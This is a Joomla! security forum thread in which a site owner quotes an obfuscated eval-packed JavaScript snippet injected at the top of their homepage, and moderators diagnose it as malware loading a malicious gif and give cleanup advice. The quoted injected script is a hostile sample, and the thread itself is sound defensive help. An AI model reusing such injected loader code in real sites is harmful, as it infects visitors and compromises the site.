eval(function(p,a,c,k,e,d) - no Č and Ć letters

Discussion regarding Joomla! 3.x security issues.

Moderators: Bernard T, mandville, PhilD, fcoulter, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
igorjov
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Fri Oct 16, 2015 4:42 pm

eval(function(p,a,c,k,e,d) - no Č and Ć letters

Postby igorjov » Wed Nov 15, 2017 12:04 pm

joomla 3.7.2
please open banjakoviljaca.org and see bigginings of articles on homepage
how can i solve this:
eval(function(p,a,c,k,e,d);if(!''.replace(/^/,String))k=[function(e)];e=function();c=1};while(c--)}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eetrn|var|u0026u|referrer|dhbrr||js|php'.split('|'),0,{}))

Thanks

User avatar
fcoulter
Joomla! Ace
Joomla! Ace
Posts: 1372
Joined: Thu Sep 13, 2007 11:39 am
Location: UK
Contact:

Re: eval(function(p,a,c,k,e,d) - no Č and Ć letters

Postby fcoulter » Wed Nov 15, 2017 12:23 pm

Your site seems to be infected with malware, see https://sitecheck.sucuri.net/results/banjakoviljaca.org

There are instructions for cleaning your site here: https://forum.joomla.org/viewtopic.php?f=714&t=946026

So far as I know eval(function(p,a,c,k,e,d) etc is not necessarily in itself malicious, it is sometimes use to unpack javascript files, however in this case it looks like it is being used to load malware, in the first line of the html document. It seems to be a malicious gif document /media/media/images/progres1.gif
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator
VEL team member
"Wearing my tin foil hat with pride"

vincenzore1981
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Sun Nov 12, 2017 8:58 am

Re: eval(function(p,a,c,k,e,d) - no Č and Ć letters

Postby vincenzore1981 » Wed Nov 15, 2017 4:34 pm

I would like to point out that the method described above works only if the infection is in the files. If the infection is in database data then that is not enough.

To find out, you can use phpmyadmin and search for the "%eval(function%" string in all tables.

User avatar
fcoulter
Joomla! Ace
Joomla! Ace
Posts: 1372
Joined: Thu Sep 13, 2007 11:39 am
Location: UK
Contact:

Re: eval(function(p,a,c,k,e,d) - no Č and Ć letters

Postby fcoulter » Wed Nov 15, 2017 5:26 pm

The infection is in the very first line of the html page, before even the head tag. That makes it unlikely that it would be in the database. If that were true then it would appear in the article or other content. Not at the top of the page.

Also the actual malicious script is a gif file, as I made clear before, not in the database. This makes it clear that the attacker had access to the file system, there is no other way of placing it there.

The advice I gave is for cleaning the file system, and you should do that as a matter of priority.

Yes I would certainly check the database once you have cleaned the file system, but NOT for the "%eval(function%" string, as it is very unlikely that you will find it there. But do check it for any users with elevated privileges, eg administrators that should not be there.

And do not think that you can "cherry pick" by just removing the malicious code, there will almost certainly be more that you do not find by that method, and your site will then soon be re-infected.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator
VEL team member
"Wearing my tin foil hat with pride"


Return to “Security in Joomla! 3.x”

Who is online

Users browsing this forum: No registered users and 5 guests